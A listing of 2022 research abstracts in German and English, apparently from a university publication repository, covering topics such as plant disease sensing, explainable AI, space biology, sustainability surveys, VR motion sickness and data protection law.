Die Anforderungen an das Detektionsmodul werden festgelegt und die Entwicklung erläutert. Das System lässt sich in einen optischen und elektronischen Aufbau teilen. Das Verhalten des elektronische Aufbaus wird anhand umfangreicher Messungen bestimmt und mit den Anforderungen verglichen. Es wird mit dem optischen Aufbau zu einem Gesamtsystem kombiniert. Mit diesem werden Messungen im vinoLAS® Laboraufbau durchgeführt, welche zur Verifikation mit einer Referenzmessung verglichen werden.
Die Messungen zum elektronischen Aufbau zeigen, dass alle gestellten Anforderungen erfüllt und teilweise übertroffen werden. Das entstandene Gated-Integrator System ist mit einem, deutlich teureren, kommerziellen Gated-Integrator vergleichbar, bietet dabei aber doppelt so viele Kanäle und ein 44% geringeres Rauschen. Mit der Diskussion der Messdaten werden außerdem Ansätze vorgestellt, die eine kostengünstige weiter Verbesserung des elektronischen Systems ermöglichen.
Die Messungen mit dem Gesamtsystem zeigen eine qualitative Übereinstimmung mit der Referenzmessung, es sind jedoch noch quantitative Abweichungen vorhanden, die weiter untersucht werden müssen. Außerdem zeigt sich, dass die Qualität der Messdaten durch eine Schwankung der Laserfrequenz stark eingeschränkt wird. Eine leicht implementierbare und kostengünstige Lösung für dieses Problem wird jedoch vorgestellt.
Nach Umsetzung der beiden Verbesserungsvorschläge kann das System in den vinoLAS® Aufbau integriert werden und so eine kontaktlose Früherkennung von falschem Mehltau in Weinreben ermöglichen.
Due to expected positive impacts on business, the application of artificial intelligence has been widely increased. The decision-making procedures of those models are often complex and not easily understandable to the company’s stakeholders, i.e. the people having to follow up on recommendations or try to understand automated decisions of a system. This opaqueness and black-box nature might hinder adoption, as users struggle to make sense and trust the predictions of AI models. Recent research on eXplainable Artificial Intelligence (XAI) focused mainly on explaining the models to AI experts with the purpose of debugging and improving the performance of the models. In this article, we explore how such systems could be made explainable to the stakeholders. For doing so, we propose a new convolutional neural network (CNN)-based explainable predictive model for product backorder prediction in inventory management. Backorders are orders that customers place for products that are currently not in stock. The company now takes the risk to produce or acquire the backordered products while in the meantime, customers can cancel their orders if that takes too long, leaving the company with unsold items in their inventory. Hence, for their strategic inventory management, companies need to make decisions based on assumptions. Our argument is that these tasks can be improved by offering explanations for AI recommendations. Hence, our research investigates how such explanations could be provided, employing Shapley additive explanations to explain the overall models’ priority in decision-making. Besides that, we introduce locally interpretable surrogate models that can explain any individual prediction of a model. The experimental results demonstrate effectiveness in predicting backorders in terms of standard evaluation metrics and outperform known related works with AUC 0.9489. Our approach demonstrates how current limitations of predictive technologies can be addressed in the business domain.
When the Artemis missions launch, NASA's Orion spacecraft (and crew as of the Artemis II mission) will be exposed to the deep space radiation environment beyond the protection of Earth's magnetosphere. Hence, it is essential to characterize the effects of space radiation, microgravity, and the combination thereof on cells and organisms, i.e., to quantify any correlations between the deep space radiation environment, genetic variation, and induced genetic changes in cells. To address this, the Artemis I mission will include the Peristaltic Laboratory for Automated Science with Multigenerations (PLASM) hardware containing the Deep Space Radiation Genomics (DSRG) experiment. The scientific aims of DSRG are (i) to identify the metabolic and genomic pathways in yeast affected by microgravity, space radiation, and their combination, and (ii) to differentiate between gravity and radiation exposure on single-gene deletion/overexpressing strains' ability to thrive in the spaceflight environment. Yeast is used as a model system because 70% of its essential genes have a human homolog, and over half of these homologs can functionally replace their human counterpart. As part of the experiment preparation towards spaceflight, an Experiment Verification Test (EVT) was performed at the Kennedy Space Center to verify that the experiment design, hardware, and approach to automated operations will enable achieving the scientific aims. For the EVT, fluidic systems were assembled, sterilized, loaded, and acceptance-tested, and subsequently integrated with the engineering parts to produce a flight-like PLASM unit. Each fluidic system consisted of (i) a Media Bag, (ii) four Culture Bags loaded with Saccharomyces cerevisiae (two with deletion series and the remaining two with overexpression series), and (iii) tubing and check valves. The EVT PLASM unit was put under a temperature profile replicating the anticipated different phases of flight, including handover to launch, spaceflight, and splashdown to handover back to the science team, for a 58-day period. At EVT completion, the rate of activation, cellular growth, RNA integrity, and sample contamination were interrogated. All of the experiment's success criteria were satisfied, encouraging our efforts to perform this investigation on Artemis I. This manuscript thus describes the process of spaceflight experiment design maturation with a focus on the EVT, its results, DSRG's preparation for its planned launch on Artemis I in 2022, and how the PLASM hardware can enable other scientific goals on future Artemis missions and/or the Lunar Orbital Platform – Gateway.
Breaking new ground and setting new trends in research, teaching and transfer - this is what the Hochschule Bonn-Rhein-Sieg (H-BRS) managed to do last year despite the Corona pandemic. Talents, ideas and cooperations have come to fruition in various ways, always in close exchange between applied science, society and business. "expand" is therefore the motto of the annual report of the H-BRS for the year 2021, which has now been published.
The research examines Generation Z’s (Gen Z’s) attitudes, behavior and awareness regarding sustainability-oriented products in two European countries, located in the region of Western Balkans, Bosnia–Herzegovina and Serbia. The research deploys generational cohort theory (GCT) and a quantitative analysis of primary data collected through an online questionnaire among 1338 primary, high school and university students, all belonging to Generation Z. It deploys a Confirmatory Factor Analysis (CFA) by running both Maximum Likelihood (ML) and Markov Chain Monte Carlo (MCMC) procedures, the latter being suitable for binary variables, which have been deployed in the study. The results of MLCFA provide evidence that there is a statistically significant and relatively strong relation between sustainability and circular economy attitudes (SCEA) and sustainability and circular economy behavior (SCEB), while there is a statistically insignificant and relatively weak relation between sustainability and circular economy behavior (SCEB) and circular economy awareness (CEW). The results of the BCFA, which is based on MCMC procedure, are similar to the results based on a rather commonly used MLCFA procedure. The results also confirm that Gen Z knows more about the companies which recycle products than it does about the CE as a concept, while the vast majority is concerned about the future of the planet and is motivated to learn more about the CE through CE and various awareness-raising measures.
(1) Background: Autologous bone is supposed to contain vital cells that might improve the osseointegration of dental implants. The aim of this study was to investigate particulate and filtered bone chips collected during oral surgery intervention with respect to their osteogenic potential and the extent of microbial contamination to evaluate its usefulness for jawbone reconstruction prior to implant placement. (2) Methods: Cortical and cortical-cancellous bone chip samples of 84 patients were collected. The stem cell character of outgrowing cells was characterized by expression of CD73, CD90 and CD105, followed by osteogenic differentiation. The degree of bacterial contamination was determined by Gram staining, catalase and oxidase tests and tests to evaluate the genera of the found bacteria (3) Results: Pre-surgical antibiotic treatment of the patients significantly increased viability of the collected bone chip cells. No significant difference in plasticity was observed between cells isolated from the cortical and cortical-cancellous bone chip samples. Thus, both types of bone tissue can be used for jawbone reconstruction. The osteogenic differentiation was independent of the quantity and quality of the detected microorganisms, which comprise the most common bacteria in the oral cavity. (4) Discussion: This study shows that the quality of bone chip-derived stem cells is independent of the donor site and the extent of present common microorganisms, highlighting autologous bone tissue, assessable without additional surgical intervention for the patient, as a useful material for dental implantology.
In Forschung, Lehre und Transfer neue Wege beschreiten und Akzente setzen – das hat die Hochschule Bonn-Rhein-Sieg (H-BRS) im vergangenen Jahr trotz der Corona-Pandemie geschafft. Talente, Ideen und Kooperationen sind in unterschiedlicher Weise zur Geltung gekommen, stets im engen Austausch zwischen angewandter Wissenschaft, Gesellschaft und Wirtschaft. „Entfalten“ lautet deshalb das Motto des Jahresberichts der H-BRS für das Jahr 2021, der jetzt erschienen ist.
The accurate forecasting of solar radiation plays an important role for predictive control applications for energy systems with a high share of photovoltaic (PV) energy. Especially off-grid microgrid applications using predictive control applications can benefit from forecasts with a high temporal resolution to address sudden fluctuations of PV-power. However, cloud formation processes and movements are subject to ongoing research. For now-casting applications, all-sky-imagers (ASI) are used to offer an appropriate forecasting for aforementioned application. Recent research aims to achieve these forecasts via deep learning approaches, either as an image segmentation task to generate a DNI forecast through a cloud vectoring approach to translate the DNI to a GHI with ground-based measurement (Fabel et al., 2022; Nouri et al., 2021), or as an end-to-end regression task to generate a GHI forecast directly from the images (Paletta et al., 2021; Yang et al., 2021). While end-to-end regression might be the more attractive approach for off-grid scenarios, literature reports increased performance compared to smart-persistence but do not show satisfactory forecasting patterns (Paletta et al., 2021). This work takes a step back and investigates the possibility to translate ASI-images to current GHI to deploy the neural network as a feature extractor. An ImageNet pre-trained deep learning model is used to achieve such translation on an openly available dataset by the University of California San Diego (Pedro et al., 2019). The images and measurements were collected in Folsom, California. Results show that the neural network can successfully translate ASI-images to GHI for a variety of cloud situations without the need of any external variables. Extending the neural network to a forecasting task also shows promising forecasting patterns, which shows that the neural network extracts both temporal and momentarily features within the images to generate GHI forecasts.
The processing of employees’ personal data is dramatically increasing, yet there is a lack of tools that allow employees to manage their privacy. In order to develop these tools, one needs to understand what sensitive personal data are and what factors influence employees’ willingness to disclose. Current privacy research, however, lacks such insights, as it has focused on other contexts in recent decades. To fill this research gap, we conducted a cross-sectional survey with 553 employees from Germany. Our survey provides multiple insights into the relationships between perceived data sensitivity and willingness to disclose in the employment context. Among other things, we show that the perceived sensitivity of certain types of data differs substantially from existing studies in other contexts. Moreover, currently used legal and contextual distinctions between different types of data do not accurately reflect the subtleties of employees’ perceptions. Instead, using 62 different data elements, we identified four groups of personal data that better reflect the multi-dimensionality of perceptions. However, previously found common disclosure antecedents in the context of online privacy do not seem to affect them. We further identified three groups of employees that differ in their perceived data sensitivity and willingness to disclose, but neither in their privacy beliefs nor in their demographics. Our findings thus provide employers, policy makers, and researchers with a better understanding of employees’ privacy perceptions and serve as a basis for future targeted research
on specific types of personal data and employees.
Emotions are associated with the genesis of visually induced motion sickness in virtual reality
(2022)
Visually induced motion sickness (VIMS) is a well-known side effect of virtual reality (VR) immersion, with symptoms including nausea, disorientation, and oculomotor discomfort. Previous studies have shown that pleasant music, odor, and taste can mitigate VIMS symptomatology, but the mechanism by which this occurs remains unclear. We predicted that positive emotions influence the VIMS-reducing effects. To investigate this, we conducted an experimental study with 68 subjects divided into two groups. The groups were exposed to either positive or neutral emotions before and during the VIMS-provoking stimulus. Otherwise, they performed exactly the same task of estimating the time-to-contact while confronted with a VIMS-provoking moving starfield stimulation. Emotions were induced by means of pre-tested videos and with International Affective Picture System (IAPS) images embedded in the starfield simulation. We monitored emotion induction before, during, and after the simulation, using the Self-Assessment Manikin (SAM) valence and arousal scales. VIMS was assessed before and after exposure using the Simulator Sickness Questionnaire (SSQ) and during simulation using the Fast Motion Sickness Scale (FMS) and FMS-D for dizziness symptoms. VIMS symptomatology did not differ between groups, but valence and arousal were correlated with perceived VIMS symptoms. For instance, reported positive valence prior to VR exposure was found to be related to milder VIMS symptoms and, conversely, experienced symptoms during simulation were negatively related to subjects’ valence. This study sheds light on the complex and potentially bidirectional relationship of VIMS and emotions and provides starting points for further research on the use of positive emotions to prevent VIMS.
Current research in augmented, virtual, and mixed reality (XR) reveals a lack of tool support for designing and, in particular, prototyping XR applications. While recent tools research is often motivated by studying the requirements of non-technical designers and end-user developers, the perspective of industry practitioners is less well understood. In an interview study with 17 practitioners from different industry sectors working on professional XR projects, we establish the design practices in industry, from early project stages to the final product. To better understand XR design challenges, we characterize the different methods and tools used for prototyping and describe the role and use of key prototypes in the different projects. We extract common elements of XR prototyping, elaborating on the tools and materials used for prototyping and establishing different views on the notion of fidelity. Finally, we highlight key issues for future XR tools research.
Einleitung
(2022)
A main factor hampering life in space is represented by high atomic number nuclei and energy (HZE) ions that constitute about 1% of the galactic cosmic rays. In the frame of the “STARLIFE” project, we accessed the Heavy Ion Medical Accelerator (HIMAC) facility of the National Institute of Radiological Sciences (NIRS) in Chiba, Japan. By means of this facility, the extremophilic species Haloterrigena hispanica and Parageobacillus thermantarcticus were irradiated with high LET ions (i.e., Fe, Ar, and He ions) at doses corresponding to long permanence in the space environment. The survivability of HZE-treated cells depended upon either the storage time and the hydration state during irradiation; indeed, dry samples were shown to be more resistant than hydrated ones. With particular regard to spores of the species P. thermantarcticus, they were the most resistant to irradiation in a water medium: an analysis of the changes in their biochemical fingerprinting during irradiation showed that, below the survivability threshold, the spores undergo to a germination-like process, while for higher doses, inactivation takes place as a consequence of the concomitant release of the core’s content and a loss of integrity of the main cellular components. Overall, the results reported here suggest that the selected extremophilic microorganisms could serve as biological model for space simulation and/or real space condition exposure, since they showed good resistance to ionizing radiation exposure and were able to resume cellular growth after long-term storage.
Effective Neighborhood Feature Exploitation in Graph CNNs for Point Cloud Object-Part Segmentation
(2022)
Part segmentation is the task of semantic segmentation applied on objects and carries a wide range of applications from robotic manipulation to medical imaging. This work deals with the problem of part segmentation on raw, unordered point clouds of 3D objects. While pioneering works on deep learning for point clouds typically ignore taking advantage of local geometric structure around individual points, the subsequent methods proposed to extract features by exploiting local geometry have not yielded significant improvements either. In order to investigate further, a graph convolutional network (GCN) is used in this work in an attempt to increase the effectiveness of such neighborhood feature exploitation approaches. Most of the previous works also focus only on segmenting complete point cloud data. Considering the impracticality of such approaches, taking into consideration the real world scenarios where complete point clouds are scarcely available, this work proposes approaches to deal with partial point cloud segmentation.
In the attempt to better capture neighborhood features, this work proposes a novel method to learn regional part descriptors which guide and refine the segmentation predictions. The proposed approach helps the network achieve state-of-the-art performance of 86.4% mIoU on the ShapeNetPart dataset for methods which do not use any preprocessing techniques or voting strategies. In order to better deal with partial point clouds, this work also proposes new strategies to train and test on partial data. While achieving significant improvements compared to the baseline performance, the problem of partial point cloud segmentation is also viewed through an alternate lens of semantic shape completion.
Semantic shape completion networks not only help deal with partial point cloud segmentation but also enrich the information captured by the system by predicting complete point clouds with corresponding semantic labels for each point. To this end, a new network architecture for semantic shape completion is also proposed based on point completion network (PCN) which takes advantage of a graph convolution based hierarchical decoder for completion as well as segmentation. In addition to predicting complete point clouds, results indicate that the network is capable of reaching within a margin of 5% to the mIoU performance of dedicated segmentation networks for partial point cloud segmentation.
While the recent discussion on Art. 25 GDPR often considers the approach of data protection by design as an innovative idea, the notion of making data protection law more effective through requiring the data controller to implement the legal norms into the processing design is almost as old as the data protection debate. However, there is another, more recent shift in establishing the data protection by design approach through law, which is not yet understood to its fullest extent in the debate. Art. 25 GDPR requires the controller to not only implement the legal norms into the processing design but to do so in an effective manner. By explicitly declaring the effectiveness of the protection measures to be the legally required result, the legislator inevitably raises the question of which methods can be used to test and assure such efficacy. In our opinion, extending the legal compatibility assessment to the real effects of the required measures opens this approach to interdisciplinary methodologies. In this paper, we first summarise the current state of research on the methodology established in Art. 25 sect. 1 GDPR, and pinpoint some of the challenges of incorporating interdisciplinary research methodologies. On this premise, we present an empirical research methodology and first findings which offer one approach to answering the question on how to specify processing purposes effectively. Lastly, we discuss the implications of these findings for the legal interpretation of Art. 25 GDPR and related provisions, especially with respect to a more effective implementation of transparency and consent, and provide an outlook on possible next research steps.
Education for Sustainable Development (ESD, SDG 4) and human well-being (SDG 3) are among the central subjects of the Sustainable Development Goals (SDGs). In this article, based on the Questionnaire for Eudaimonic Well-Being (QEWB), we investigate to what extent (a) there is a connection between EWB and practical commitment to the SDGs and whether (b) there is a deficit in EWB among young people in general. We also want to use the article to draw attention to the need for further research on the links between human well-being and commitment for sustainable development. A total of 114 students between the ages of 18 and 34, who are either engaged in (extra)curricular activities of sustainable development (28 students) or not (86 students), completed the QEWB. The students were interviewed twice: once regarding their current and their aspired EWB. Our results show that students who are actively engaged in activities for sustainable development report a higher EWB than non-active students. Furthermore, we show that students generally report deficits in EWB and wish for an improvement in their well-being. This especially applies to aspects of EWB related to self-discovery and the sense of meaning in life. Our study suggests that a practice-oriented ESD in particular can have a positive effect on the quality of life of young students and can support them in working on deficits in EWB.
E-Sport im Fernsehen - Eine Analyse der Chancen eines neuen Themenfelds bei deutschen Fernsehsendern
(2022)
In den letzten Jahren hat die mediale Präsenz des E-Sports in Deutschland zugenommen, was dazu führte, dass auch die Allgemeinheit sich mit dem Thema auseinandersetzt. Dadurch sind Fernsehunternehmen auf die ursprüngliche Nischensportart, welche im Internet beheimatet und dort stark verwurzelt ist, aufmerksam geworden und bauen ihr Engagement in dem Bereich aus, um an dem wachsenden Erfolg teilzuhaben, der dem E-Sport prognostiziert wird. Doch eine erfolgreiche und geeignete Thematisierung des Trendthemas scheint aufgrund der besonderen Rahmenbedingungen nicht so einfach zu sein, wie es bei anderen klassischen Sportarten der Fall ist. Daraus ergibt sich die Frage: Welche Chancen hat die Thematisierung des E-Sports bei deutschen Fernsehsendern, wenn man die besonderen Gegebenheiten zusammen betrachtet? Die TV-Sender haben hierbei die Aufgabe, ein Publikum zu gewinnen, welches eigentlich gewohnt ist, dieses Thema im Internet zu konsumieren – dabei verliert das Fernsehen seit dem digitalen Zeitalter sowieso schon immer mehr Zuschauende an ebendieses. Neben den Hindernissen, die überwunden werden müssen, bietet der E-Sport den Fernsehunternehmen aber auch Mehrwerte – beides wird in dieser Arbeit ergründet.
Diese explorative Forschungsarbeit bietet einen Ansatz für die weitere Erforschung des E-Sports in den deutschen Medien – vor allem, da existierende Arbeiten sich hauptsächlich auf Live-Streaming-Portale oder die Darstellung des E-Sports in den klassischen Medien beziehen und ein Bezug zu den Intentionen und Gedanken der Fernsehunternehmen nicht vorhanden ist. Um diese Lücke zu schließen, wurden sieben Handelnde bei deutschen TV-Sendern oder Senderfamilien interviewt, die den E-Sport schon in unterschiedlicher Intensivität behandelt oder Überlegungen dazu durchgeführt haben. Den Abschluss dieser Arbeit - und gleichzeitige Anknüpfungspunkte für eine weiterführende Forschung zu dem Thema - bilden die acht Hypothesen, die einen Aufschluss darüber geben, welche Faktoren einen Einfluss auf die Chancen einer Thematisierung haben und die durch die Methode der qualitativen Inhaltsanalyse erstellt wurden. Der Forschungsgegenstand wurde dabei unter einer Vielzahl besonderer Aspekte und deren Wechselwirkungen betrachtet, wie z. B. den unterschiedlichen Senderformen, den Umständen innerhalb der E-Sport-Branche oder den vorhandenen Unternehmensstrukturen.
We analyze short-term effects of free hospitalization insurance for the poorest quintile of the population in the province of Khyber Pakhtunkhwa, Pakistan. First, we exploit that eligibility is based on an exogenous poverty score threshold and apply a regression discontinuity design. Second, we exploit imperfect rollout and compare insured and uninsured households using propensity score matching. With both methods we fail to detect significant effects on the incidence of hospitalization. Whereas the program did not meaningfully increase the quantity of health care consumed, insured households more often choose private hospitals, indicating a shift towards higher perceived quality of care.